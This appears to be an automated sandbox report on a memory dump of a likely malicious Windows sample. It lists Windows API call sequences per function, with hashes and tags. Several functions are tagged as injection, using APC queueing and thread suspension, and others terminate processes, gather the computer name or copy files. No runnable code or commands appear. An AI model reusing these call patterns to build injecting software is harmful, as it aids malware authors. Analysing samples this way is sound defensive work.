Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
String ID:
API String ID: 1628847533-0
Opcode ID: 6afb32129ad603425039df656426fc69f08657f7cae84c59f09001292d7c27cc
Instruction ID: b8fedd7f4a154a3d4e6763e54f3dd9cc7652a89a96b0741ae0c2369cf32216ef
Opcode Fuzzy Hash: 6afb32129ad603425039df656426fc69f08657f7cae84c59f09001292d7c27cc
Instruction Fuzzy Hash: 1721B272940318FFCB62EFA5DC48EAEBBBCEB85210B2541A5F915A2104D7745D40DB51

Uniqueness

Uniqueness Score: -1.00%

Function 0374DE59, Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03734F06: GetCurrentThreadId.KERNEL32 ref: 03734F3E
Part of subcall function 03734F06: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,037336C6,00000000,?,00000000,00000000,03731AC4,?,?,?,?,?,03731AC4), ref: 03734F4A
Part of subcall function 03734F06: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,037336C6,00000000,?,00000000,00000000,03731AC4), ref: 03734F58
Part of subcall function 03734F06: lstrcpy.KERNEL32(00000000), ref: 03734F7A

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00001ED2,?,00000000,?,?,03739DFA,00000000), ref: 0374DE9A
HeapFree.KERNEL32(00000000,00000000,?,00000000,00001ED2,?,00000000,?,?,03739DFA,00000000,00000000,00000004), ref: 0374DF0D

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: File$Time$CreateCurrentFreeHeapNameSystemTempThreadlstrcpy
String ID:
API String ID: 1158284192-0
Opcode ID: 1ceaca533f5183690a3552298ad7e3b8b83f11d543ad1fd47eb33c888bd1230f
Instruction ID: bcab47daa28bfc1e82d71395dea6034184799fee36369428ee9828c1e9387251
Opcode Fuzzy Hash: 1ceaca533f5183690a3552298ad7e3b8b83f11d543ad1fd47eb33c888bd1230f
Instruction Fuzzy Hash: CF115332240328FBD332BB62EC8CF6F3E5CEB42760F108120F645961D2C7A6488182A0

Uniqueness

Uniqueness Score: -1.00%

Function 0373CCF4, Relevance: 10.6, APIs: 7, Instructions: 68threadprocesslibraryCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0373CD26
GetModuleHandleA.KERNEL32(?,06EB2386,00000004,00000000,00000000,?,00000000), ref: 0373CD46
GetProcAddress.KERNEL32(00000000), ref: 0373CD4D
Thread32First.KERNEL32(?,0000001C), ref: 0373CD5D
OpenThread.KERNEL32(001F03FF,00000000,?,?,0000001C), ref: 0373CD78
QueueUserAPC.KERNEL32(00000001,00000000,00000000), ref: 0373CD89
Thread32Next.KERNEL32(?,0000001C), ref: 0373CD99

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Thread32$AddressCreateFirstHandleModuleNextOpenProcQueueSnapshotThreadToolhelp32User
String ID:
API String ID: 190292596-0
Opcode ID: 72e149c34bc2bdee8117b89700027e7159f8f62f59ee223f128d20b2040dfb0f
Instruction ID: 10b44a403408551b53d4108a533d491fe9b601e9b9fe25e80c71d32dd9567c75
Opcode Fuzzy Hash: 72e149c34bc2bdee8117b89700027e7159f8f62f59ee223f128d20b2040dfb0f
Instruction Fuzzy Hash: CB21CA7290020DFFDF06EFA1DC88DAE7FB9EB09350B14812AFA00B6050C7749A41DB60

Uniqueness

Uniqueness Score: -1.00%

Function 03738F0E, Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 03738F3F
wcstombs.NTDLL ref: 03738F50
OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 03738F71
TerminateProcess.KERNEL32(00000000,00000000), ref: 03738F80
CloseHandle.KERNEL32(00000000), ref: 03738F87
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 03738F96
WaitForSingleObject.KERNEL32(00000000), ref: 03738FA6

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
String ID:
API String ID: 417118235-0
Opcode ID: ffeefecc6483028f649dd79e2f8adfd7afe0166b701dafa6d8e29dcb06435b8b
Instruction ID: 73e2fcbb599479d56a5897289e621a6a532a2f378269018b50068a4f69bfc116
Opcode Fuzzy Hash: ffeefecc6483028f649dd79e2f8adfd7afe0166b701dafa6d8e29dcb06435b8b
Instruction Fuzzy Hash: FC11E23210031AFBD715AB55DC48FAABBA9FF05311F148010F505A2181C7F9E895DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03734466, Relevance: 10.6, APIs: 7, Instructions: 59sleepsynchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,03749C40), ref: 0373447B

Part of subcall function 03733CE8: InterlockedExchange.KERNEL32(?,000000FF), ref: 03733CEF

WaitForSingleObject.KERNEL32(?,000000FF,?,?,03749C40), ref: 0373449B
RtlEnterCriticalSection.NTDLL(?), ref: 037344B6
RtlLeaveCriticalSection.NTDLL(?), ref: 037344CE
Sleep.KERNEL32(000001F4), ref: 037344DD
LocalFree.KERNEL32(?), ref: 037344F5
RtlDeleteCriticalSection.NTDLL(?), ref: 037344FF

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: CriticalSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
String ID:
API String ID: 3004309391-0
Opcode ID: e092fae48df48fc4f2225733d081fd6aaa8751d67b9ce6e6afe0e4dc16e84326
Instruction ID: 8d4a47c9ac9de31ceac11171443ebc16ee8d7fe5a195d8f1953f354c1d16190c
Opcode Fuzzy Hash: e092fae48df48fc4f2225733d081fd6aaa8751d67b9ce6e6afe0e4dc16e84326
Instruction Fuzzy Hash: 38115A3610471AEFDB34EBA7EC4895AB7F8BF067113198928E58693455DB79E880CB20

Uniqueness

Uniqueness Score: -1.00%

Function 0373FE4B, Relevance: 9.2, APIs: 6, Instructions: 250memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 0373FE81
lstrcat.KERNEL32(00000000,?), ref: 0373FF81
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0374000B
RtlEnterCriticalSection.NTDLL(037582EC), ref: 03740024
RtlLeaveCriticalSection.NTDLL(037582EC), ref: 03740042

Part of subcall function 03743BDC: strcpy.NTDLL ref: 03743C26
Part of subcall function 03743BDC: lstrcat.KERNEL32(00000000,?), ref: 03743C31
Part of subcall function 03743BDC: StrTrimA.SHLWAPI(00000000,0375452C,00000000,00000000,?,?,00000000,03740055,00000000,0375832C), ref: 03743C4E

StrTrimA.SHLWAPI(00000000,037543E8,00000000,0375832C), ref: 03740078

Part of subcall function 0373AC84: lstrcpy.KERNEL32(00000000,037582CC), ref: 0373ACB0
Part of subcall function 0373AC84: lstrcat.KERNEL32(00000000,?), ref: 0373ACBB

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: lstrcat$AllocateCriticalHeapSectionTrim$EnterLeavelstrcpystrcpy
String ID:
API String ID: 35268623-0
Opcode ID: 8e28012de76dfdbb4abbb6039c25d6d0efe82eb0f8c06277f3996ea8aadd810a
Instruction ID: 1ed8d6e17c432e4779a0ecd435b625e03ad7177de1da93b723c6f2232a202b58
Opcode Fuzzy Hash: 8e28012de76dfdbb4abbb6039c25d6d0efe82eb0f8c06277f3996ea8aadd810a
Instruction Fuzzy Hash: 70917972600349EFD749EF68EC84E1ABBE8EB08340F048419F949D7265D7B9E846CB52

Uniqueness

Uniqueness Score: -1.00%

Function 037378A6, Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0373ECA1: RtlAllocateHeap.NTDLL(00000000,00000001,03750F65), ref: 0373ECAD

GetLastError.KERNEL32(?,?,?,00001000), ref: 03737927
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 037379AC
CloseHandle.KERNEL32(00000000), ref: 037379C6
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 037379FB

Part of subcall function 037377FF: RtlReAllocateHeap.NTDLL(00000000,00000000,00000000,0374C832), ref: 0373780F

WaitForSingleObject.KERNEL32(?,00000064), ref: 03737A7D
CloseHandle.KERNEL32(?), ref: 03737AA4

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
String ID:
API String ID: 3115907006-0
Opcode ID: a948428758422e1b86c7aaabb594fbe71d68472d512fe0e2d343a4338209ea4b
Instruction ID: f5e4887fc83dcbf500e25efe74d709cc23c0e88e37d1423c4916e1eac1dd38ab
Opcode Fuzzy Hash: a948428758422e1b86c7aaabb594fbe71d68472d512fe0e2d343a4338209ea4b
Instruction Fuzzy Hash: A38139B1D00259EFDB15DF98C884AAEFBB5FF09310F148559E945AB252D731AE40CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0373C763, Relevance: 9.1, APIs: 6, Instructions: 125threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0373C786

Part of subcall function 03745D54: GetModuleHandleA.KERNEL32(?,?,03758108,03758108,?,0373B39D,00000000,00000000,03758108,00000000,?,?,03732A85,?,00000000,?), ref: 03745D75
Part of subcall function 03745D54: GetProcAddress.KERNEL32(00000000,?), ref: 03745D8E
Part of subcall function 03745D54: OpenProcess.KERNEL32(00000400,00000000,03758108,?,03758108,03758108,?,0373B39D,00000000,00000000,03758108,00000000,?,?,03732A85,?), ref: 03745DAB
Part of subcall function 03745D54: IsWow64Process.KERNEL32(?,00000000,?,03758108,03758108,?,0373B39D,00000000,00000000,03758108,00000000,?,?,03732A85,?,00000000), ref: 03745DBC
Part of subcall function 03745D54: FindCloseChangeNotification.KERNELBASE(?,?,0373B39D,00000000,00000000,03758108,00000000,?,?,03732A85,?,00000000,?), ref: 03745DCF

ResumeThread.KERNEL32(?,?,00000000,CCCCFEEB,00000000,00000000,03754174,00000000), ref: 0373C840
WaitForSingleObject.KERNEL32(00000064), ref: 0373C84E
SuspendThread.KERNEL32(?), ref: 0373C861

Part of subcall function 0373E683: memset.NTDLL ref: 0373E94D

ResumeThread.KERNEL32(?), ref: 0373C8E4

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Thread$ProcessResumememset$AddressChangeCloseFindHandleModuleNotificationObjectOpenProcSingleSuspendWaitWow64
String ID:
API String ID: 2397206891-0
Opcode ID: 288a7e471da3365f7fe43bc59e0b3b173d7bc4ea698852106885949a270110b6
Instruction ID: dec14cfeb4ac891349961b4c01caa538a9a89b2c30b6b2544f538996338fe742
Opcode Fuzzy Hash: 288a7e471da3365f7fe43bc59e0b3b173d7bc4ea698852106885949a270110b6
Instruction Fuzzy Hash: C341C0B290030AEFDF12EFA4CC88AEE7BB9EF05310F084465E905A6111CB75DA51EB50

Uniqueness

Uniqueness Score: -1.00%

Function 03748D76, Relevance: 9.1, APIs: 6, Instructions: 124memoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 03748D8F

Part of subcall function 03733B1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 03733B59
Part of subcall function 03733B1B: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,03748DAF), ref: 03733B76
Part of subcall function 03733B1B: HeapFree.KERNEL32(00000000,00000000,?,?,03748DAF), ref: 03733B96

RtlEnterCriticalSection.NTDLL(03757FE8), ref: 03748DC7
CloseHandle.KERNEL32(00000000), ref: 03748DD5
HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,00001000,00000000,00000000,00001000), ref: 03748EAE
RtlLeaveCriticalSection.NTDLL(00000000), ref: 03748EBD
HeapFree.KERNEL32(00000000,00000000,?,00000000,00001000,00000000,00000000,00001000), ref: 03748ED0

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Heap$Free$CriticalSection$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
String ID:
API String ID: 1558671577-0
Opcode ID: 719575537bd7256e87a346eb9a9213354f96add1b6b5171b9cefb5708b863daf
Instruction ID: 7593278e4c69207e0fb659015de2f567cf90039b402a12f8ecd3b56034658193
Opcode Fuzzy Hash: 719575537bd7256e87a346eb9a9213354f96add1b6b5171b9cefb5708b863daf
Instruction Fuzzy Hash: DB41E536A0031DFBDB25EF94D884FAFB7B9AB44700F088068E914A7250D7B1E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0374BA5F, Relevance: 9.1, APIs: 6, Instructions: 119memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 0374BA89
lstrcpy.KERNEL32(00000000,?), ref: 0374BA9E
StrRChrA.SHLWAPI(00000000,00000000,0000005C), ref: 0374BAA8
GetFileAttributesA.KERNEL32(?), ref: 0374BAC7

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: AllocateAttributesFileHeaplstrcpy
String ID:
API String ID: 1077275918-0
Opcode ID: a28b4dad73293b38dd5038f72a10168f0306e1aed7052e89df7a3bfa147c106c
Instruction ID: 20fa080db139360bec3da212ba05b8931c709aab45b4cd8de0f2b509a4abd968
Opcode Fuzzy Hash: a28b4dad73293b38dd5038f72a10168f0306e1aed7052e89df7a3bfa147c106c
Instruction Fuzzy Hash: 1641E032104349EFD715EF25EC84F2B7BECEF86604F044528F984A2255DBB8E906CB62

Uniqueness

Uniqueness Score: -1.00%

Function 03749B05, Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5ba707258f4899c12ab3394a64e0393258532801ea03ca575e44c22d7d34429
Instruction ID: d8e25475f92f7c2bc83cfc0e9442c2ee0c97ab04bb9ca65ea0caa4129bf792c2
Opcode Fuzzy Hash: f5ba707258f4899c12ab3394a64e0393258532801ea03ca575e44c22d7d34429
Instruction Fuzzy Hash: 2441C5B1540754DFD724EF759C8896BBBE8FB46320B148A2EF76687180D7B0A844CF50

Uniqueness

Uniqueness Score: -1.00%

Function 037358E7, Relevance: 9.1, APIs: 6, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 0373599C
memcpy.NTDLL(00000000,00000002,?), ref: 037359AD
memcpy.NTDLL(00000000,?,?), ref: 037359C3
memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 037359D5
memcpy.NTDLL(00000000,037543E8,00000002,00000000,?,?,00000000,?,?), ref: 037359E8
memcpy.NTDLL(00000000,?,00000002), ref: 037359FD

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: memcpy$AllocateHeap
String ID:
API String ID: 4068229299-0
Opcode ID: de953dcd8b3f5f2a1701bf79c3f427cbb8d246c6d849a1d1405ca6ec3fabf2de
Instruction ID: e3ca3f30feb50eefde5b059e0e1d2b17c656768f5aed046c9bfc9eb2a672fa7a
Opcode Fuzzy Hash: de953dcd8b3f5f2a1701bf79c3f427cbb8d246c6d849a1d1405ca6ec3fabf2de
Instruction Fuzzy Hash: 03416D76D0031AEFCF11DFA8CC84A9EBBB8EF49224F148456E915A7202E771DA50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0373577B, Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,03754600,00000018,03733C32,?,?,?), ref: 037357BE
VirtualProtect.KERNEL32(00000000,00000004,?,?,00000000,00000004,?,?,?,?,?,?,?,03754600,00000018,03733C32), ref: 03735849
RtlEnterCriticalSection.NTDLL(03758380), ref: 03735872
RtlLeaveCriticalSection.NTDLL(03758380), ref: 03735890

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
String ID:
API String ID: 3666628472-0
Opcode ID: ed642bb5ba371fcd7b5ffa88d4ee89d7c9f0b8009676cae721edf3f165e7ca2d
Instruction ID: 4385fe4afc04c66adb3df4ca2624b112133689220d2e10fce9416edba48a3af6
Opcode Fuzzy Hash: ed642bb5ba371fcd7b5ffa88d4ee89d7c9f0b8009676cae721edf3f165e7ca2d
Instruction Fuzzy Hash: 34419075900309EFDB14DF66C88499DBBF8FF4A310B148559E915EB211D774EA40DF90

Uniqueness

Uniqueness Score: -1.00%

Function 03748636, Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 108stringCOMMON

Download Yara Rule

APIs

Part of subcall function 03742035: lstrlen.KERNEL32(00000000,00000008,037582C0,00000000,?,?,0373D77B,00000000,037582C0,037582C4,037582C0,?,0373505E,?,?,00000000), ref: 03742041
Part of subcall function 03742035: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0373D77B,00000000,037582C0,037582C4,037582C0,?,0373505E,?), ref: 0374209F
Part of subcall function 03742035: lstrcpy.KERNEL32(00000000,00000000), ref: 037420AF

lstrlen.KERNEL32(00000008,?,?,00000000,00000004,00000000), ref: 03748682
wsprintfA.USER32 ref: 037486B0
lstrlen.KERNEL32(00000000,20000000,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 0374870E
GetLastError.KERNEL32 ref: 03748725
GetLastError.KERNEL32 ref: 03748756

Strings

`, xrefs: 037486E9

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: lstrlen$ErrorLast$lstrcpymemcpywsprintf
String ID: `
API String ID: 640181277-1850852036
Opcode ID: 4c19e4d5cb43bb94fe98d8552d9a4f1232cd77c6b7707fc449e957cf197a43c5
Instruction ID: 6cdae9f91914dae66a239bbc9f4d705e2516718f4b555db6af0143edf682b3aa
Opcode Fuzzy Hash: 4c19e4d5cb43bb94fe98d8552d9a4f1232cd77c6b7707fc449e957cf197a43c5
Instruction Fuzzy Hash: 81419B72400309FFDB11EFA4DE88BABBBB8FF04311F104469E905A2151D775AA64DB62

Uniqueness

Uniqueness Score: -1.00%

Function 03741E81, Relevance: 9.1, APIs: 6, Instructions: 94memoryfilestringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 03741ED6
lstrcpyW.KERNEL32(00000000,?), ref: 03741EEB
CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,03754054,?,03733AD4,?,?,?,00000000,?), ref: 03741F06
CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,03754054,?,03733AD4,?,?,?,00000000), ref: 03741F20
CopyFileW.KERNEL32(03733AD4,00000000,00000000,?,?,0000005C,?,?,00000000,?,03754054,?,03733AD4,?,?,?), ref: 03741F5D
HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,03754054,?,03733AD4,?,?,?,00000000), ref: 03741F6B

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
String ID:
API String ID: 2686460493-0
Opcode ID: 50621d8c3b227b1de36bcddc5d6d88f97d64f9d672dec2a7d5ff4c714fb450c8
Instruction ID: 8590220316e7ad7a24cf54e55d039f8de05316963ded784c3f120eb957991bd1
Opcode Fuzzy Hash: 50621d8c3b227b1de36bcddc5d6d88f97d64f9d672dec2a7d5ff4c714fb450c8
Instruction Fuzzy Hash: CB21AC32105328EFC325BB62DC88D2FBBB8FF89A55F05451DF54992021C7789892DA65

Uniqueness

Uniqueness Score: -1.00%

Function 03745F45, Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON

Download Yara Rule

APIs

OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 03745F5F
CreateWaitableTimerA.KERNEL32(03758168,00000003,?), ref: 03745F7C
GetLastError.KERNEL32(?,?,0373976E,?), ref: 03745F8D

Part of subcall function 037447CF: RtlAllocateHeap.NTDLL(00000000,?), ref: 0374481B
Part of subcall function 037447CF: RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,0373643A,00000000,?,?), ref: 0374485F

GetSystemTimeAsFileTime.KERNEL32(?,00000000,0373976E,?,?,?,0373976E,?), ref: 03745FCD
SetWaitableTimer.KERNEL32(?,0373976E,00000000,00000000,00000000,00000000,?,?,0373976E,?), ref: 03745FEC
HeapFree.KERNEL32(00000000,0373976E,00000000,0373976E,?,?,?,0373976E,?), ref: 03746002

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: TimerWaitable$HeapTime$AllocateCloseCreateErrorFileFreeLastOpenSystem
String ID:
API String ID: 3073001550-0
Opcode ID: 3469f28142ee6102e3417a84e3e81157ce9cb67ad5eb0e6cd469663c2130ad60
Instruction ID: b1ef262a221adfac96310ab6a0314a6c45b1ca1e40d9ce2fad27d74453a08105
Opcode Fuzzy Hash: 3469f28142ee6102e3417a84e3e81157ce9cb67ad5eb0e6cd469663c2130ad60
Instruction Fuzzy Hash: F1317C72900208EBCB25EF96D888CAFBBB8EB85751F248056F445E7110D374AA80CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 03732901, Relevance: 9.1, APIs: 6, Instructions: 91memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 0373293E
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,03739C95), ref: 0373296F
GetComputerNameW.KERNEL32(00000000,?), ref: 0373297D
RtlAllocateHeap.NTDLL(00000000,?), ref: 03732994
GetComputerNameW.KERNEL32(00000000,?), ref: 037329A5
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,03739C95), ref: 037329C6

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Heap$AllocateComputerFreeName
String ID:
API String ID: 3439771632-0
Opcode ID: bad947bd99cf4587c1c4de5871c5fc9a20417db0a15f4cb52efbd3b9ad8ea32c
Instruction ID: 7f433476b9f192b89ebb264a3cc128a146aab7b268fa4177f999979f92f0fc4f
Opcode Fuzzy Hash: bad947bd99cf4587c1c4de5871c5fc9a20417db0a15f4cb52efbd3b9ad8ea32c
Instruction Fuzzy Hash: 47312AB6A00209EFDB04EFB5DD848AEBBF9FB49200B248469E505E3215E7749E41DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0374F167, Relevance: 9.1, APIs: 6, Instructions: 72memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,037330C8,?,?,?,?), ref: 0374F18B
wcstombs.NTDLL ref: 0374F1AB
lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,037330C8,?,?,?), ref: 0374F1CF
mbstowcs.NTDLL ref: 0374F1F1
HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,037330C8,?,?,?,?,?), ref: 0374F203
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,037330C8,?,?,?,?,?), ref: 0374F21D

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: FreeHeaplstrlen$mbstowcswcstombs
String ID:
API String ID: 4205542590-0
Opcode ID: 820796c6fb8724ab85f9c1bd3c6c4501ee6d6d17909d4ead91e537b176f58e43
Instruction ID: 61dcef207fbb4349b03e2ccf17629e5e087f35f501b7946bf0820387db10748f
Opcode Fuzzy Hash: 820796c6fb8724ab85f9c1bd3c6c4501ee6d6d17909d4ead91e537b176f58e43
Instruction Fuzzy Hash: 68219F32900309FFCF15AFA5EC48E9F7B79EB44314F148061F614A20A0D7B59991DB60

Uniqueness

Uniqueness Score: -1.00%

Function 03740834, Relevance: 9.1, APIs: 6, Instructions: 72filetimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 03740840
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 03740856
CreateFileMappingW.KERNEL32(000000FF,03758168,00000004,00000000,00001000,?,?,54D38000,00000192), ref: 03740897
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 037408C0
CloseHandle.KERNEL32(00000000), ref: 037408E1
GetLastError.KERNEL32 ref: 037408E9

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: File$Time$CloseCreateErrorHandleLastMappingSystemView_aulldiv
String ID:
API String ID: 1732207917-0
Opcode ID: 0d105e9095ad0e4cd72657f91e7a6e1a7da33a212147217aab98a883b066ecb3
Instruction ID: b068bef62b61e403b78a113b509a6c36e32c58958018d9ca77a1cd2f5ec4733b
Opcode Fuzzy Hash: 0d105e9095ad0e4cd72657f91e7a6e1a7da33a212147217aab98a883b066ecb3
Instruction Fuzzy Hash: E821F073640308FFC715EB65CC05F9EB7ACAB94710F258020FA19EB180DBB4A5459B90

Uniqueness

Uniqueness Score: -1.00%

Function 0373CB35, Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000000,00000008,00000000,?,0374E2CC,0374D69B,00000000,?,?,?,?,03731925,?,?), ref: 0373CB4B
RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 0373CB5E
lstrcpy.KERNEL32(00000008,?), ref: 0373CB80
GetLastError.KERNEL32(037494FA,00000000,00000000,?,0374E2CC,0374D69B,00000000,?,?,?,?,03731925,?,?), ref: 0373CBA9
HeapFree.KERNEL32(00000000,00000000,?,0374E2CC,0374D69B,00000000,?,?,?,?,03731925,?,?), ref: 0373CBC1
CloseHandle.KERNEL32(00000000,037494FA,00000000,00000000,?,0374E2CC,0374D69B,00000000,?,?,?,?,03731925,?,?), ref: 0373CBCA

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
String ID:
API String ID: 2860611006-0
Opcode ID: d9e47aa75e8725bc4f94303278adb550ea54101b688fe7977bc6f4c77571d97d
Instruction ID: 5726e0429716a59120b03e4ec11492783b357759d4f8e9fc4de31e797179a8f7
Opcode Fuzzy Hash: d9e47aa75e8725bc4f94303278adb550ea54101b688fe7977bc6f4c77571d97d
Instruction Fuzzy Hash: 3011D07354034AEFDB05EFA5DC8889ABBB8FB06260714842AF95AD3240D7749C41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 037329F1, Relevance: 9.1, APIs: 6, Instructions: 64stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(-663CD003,00000000,?), ref: 03732A19
_strupr.NTDLL ref: 03732A50
lstrlen.KERNEL32(00000000), ref: 03732A58
TerminateProcess.KERNEL32(00000000,00000000,?,00000000,?), ref: 03732A92
CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 03732A99
GetLastError.KERNEL32 ref: 03732AA1

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
String ID:
API String ID: 110452925-0
Opcode ID: 98b58785a26a35355db30384bcb86ae1dfae803078b8461a82ec10d41fe996f1
Instruction ID: 8406ee1b34cdbd6e9e69cba98a151fe3b428dca8a49763028a823153ef51422a
Opcode Fuzzy Hash: 98b58785a26a35355db30384bcb86ae1dfae803078b8461a82ec10d41fe996f1
Instruction Fuzzy Hash: B611E376600308FFDB25FB61ECC8DAE776CEB8A611B248855FD06D6046DBB884908B60

Uniqueness

Uniqueness Score: -1.00%

Function 037408F9, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,00000000,?,00000000,0373CBA5), ref: 03740910
QueueUserAPC.KERNEL32(?,00000000,?,?,0374E2CC,0374D69B,00000000,?,?,?,?,03731925,?,?), ref: 03740925
GetLastError.KERNEL32(00000000,?,0374E2CC,0374D69B,00000000,?,?,?,?,03731925,?,?), ref: 03740930
TerminateThread.KERNEL32(00000000,00000000,?,0374E2CC,0374D69B,00000000,?,?,?,?,03731925,?,?), ref: 0374093A
CloseHandle.KERNEL32(00000000,?,0374E2CC,0374D69B,00000000,?,?,?,?,03731925,?,?), ref: 03740941
